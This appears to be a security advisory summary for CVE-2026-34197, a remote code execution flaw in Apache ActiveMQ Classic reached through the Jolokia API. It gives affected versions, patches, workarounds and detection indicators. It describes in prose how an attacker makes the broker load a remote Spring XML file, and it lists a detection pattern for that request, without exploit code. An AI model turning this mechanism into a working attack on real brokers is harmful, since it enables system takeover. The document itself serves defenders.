Full Report
Security researchers discovered a remote code execution (RCE) vulnerability in Apache ActiveMQ Classic that has gone undetected for 13 years and could be exploited to execute arbitrary commands. [...]
Analysis Summary
# Vulnerability: Apache ActiveMQ Classic Remote Code Execution via Jolokia API
## CVE Details
- **CVE ID:** CVE-2026-34197
- **CVSS Score:** 8.8 (High)
- **CWE:** Not specifically named, but relates to Insecure Deserialization/Remote Config Loading (similar to CWE-94 or CWE-502).
## Affected Systems
- **Products:** Apache ActiveMQ Classic
- **Versions:**
- Versions prior to 5.19.4
- Versions 6.0.0 through 6.2.2
- **Configurations:**
- Systems where the Jolokia management API is accessible.
- **Critical Risk:** Versions 6.0.0 through 6.1.1 are especially vulnerable as they are impacted by CVE-2024-32114, which allows unauthenticated access to the Jolokia API.
## Vulnerability Description
The flaw resides in the interaction between the Jolokia management API and the ActiveMQ broker functions. Specifically, the API exposes a function called `addNetworkConnector`. An attacker can abuse this function by sending a specially crafted request that forces the broker to load an external configuration. By pointing the broker to a remote Spring XML file, the attacker can trigger the execution of arbitrary system commands during the initialization of the new network connector. The vulnerability was notably discovered using AI-assisted analysis (Claude), which identified the dangerous interaction between Jolokia, JMX, and VM transports.
## Exploitation
- **Status:** PoC available (detailed by Horizon3 researchers); not yet reported as exploited in the wild.
- **Complexity:** Medium (requires crafting a specific Jolokia request and hosting a malicious XML).
- **Attack Vector:** Network
## Impact
- **Confidentiality:** High (Full system access possible)
- **Integrity:** High (Ability to execute arbitrary commands)
- **Availability:** High (Potential for system takeover or service disruption)
## Remediation
### Patches
Users should upgrade to the following versions addressed on March 30, 2026:
- **ActiveMQ Classic 5.19.4**
- **ActiveMQ Classic 6.2.3**
### Workarounds
- Restrict access to the Jolokia management API endpoint.
- Implement strict firewall rules to prevent the broker from making outbound HTTP/HTTPS connections to unknown or untrusted servers (to prevent fetching the malicious Spring XML).
- Ensure that CVE-2024-32114 is patched to prevent unauthenticated access to management interfaces.
## Detection
### Indicators of Compromise
- **Log Patterns:** Look for suspicious broker connections in the ActiveMQ logs.
- **Protocol/Parameters:** Search for the internal transport protocol `VM` used in conjunction with the query parameter `brokerConfig=xbean:http://`.
- **Warning Messages:** A warning message regarding a "configuration problem" during connection attempts may indicate that a payload has already been executed.
### Detection methods and tools
- Monitor outbound network traffic from ActiveMQ servers for requests to external IPs/domains fetching XML files.
- Use SIEM rules to flag `addNetworkConnector` calls within Jolokia API logs.
## References
- Apache Security Advisory: hxxp[://]activemq[.]apache[.]org/security-advisories.data/CVE-2026-34197-announcement[.]txt
- Horizon3 Research Disclosure: hxxps[://]horizon3[.]ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
- NVD Detail: hxxp[://]nvd[.]nist[.]gov/vuln/detail/CVE-2026-34197